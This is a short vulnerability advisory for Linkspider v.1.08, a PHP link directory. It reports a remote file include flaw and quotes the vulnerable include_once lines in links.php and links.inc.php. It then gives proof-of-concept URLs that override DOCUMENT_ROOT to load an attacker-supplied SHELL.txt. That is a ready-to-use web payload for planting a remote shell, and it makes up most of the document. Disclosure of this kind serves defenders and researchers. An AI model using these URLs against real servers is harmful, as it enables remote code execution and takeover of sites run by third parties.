=============================================================
Linkspider v.1.08 Remote File Include Vulnerability
==============================================================
App Name : Linkspider v.1.08
HomePage : http://www.phoenix.frihost.net/linkspider/read_me.php

Vulnerability Discovered by : Rohit Bansal

Vuln Code:
----------------

links.php

include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");

also in

links.inc.php

include_once ($_SERVER['DOCUMENT_ROOT'] . "/linkspider/admin/custom.php");

POC:
---------------

htttp://site.com/[path]/links.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt>
??
htttp://site.com/[path]/links.inc.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt<http://site.com/%5Bpath%5D/links.inc.php?_SERVER%5BDOCUMENT_ROOT%5D=SHELL.txt>
??

rohitisback[at]gmail.com

================================================================
<http://gmail.com>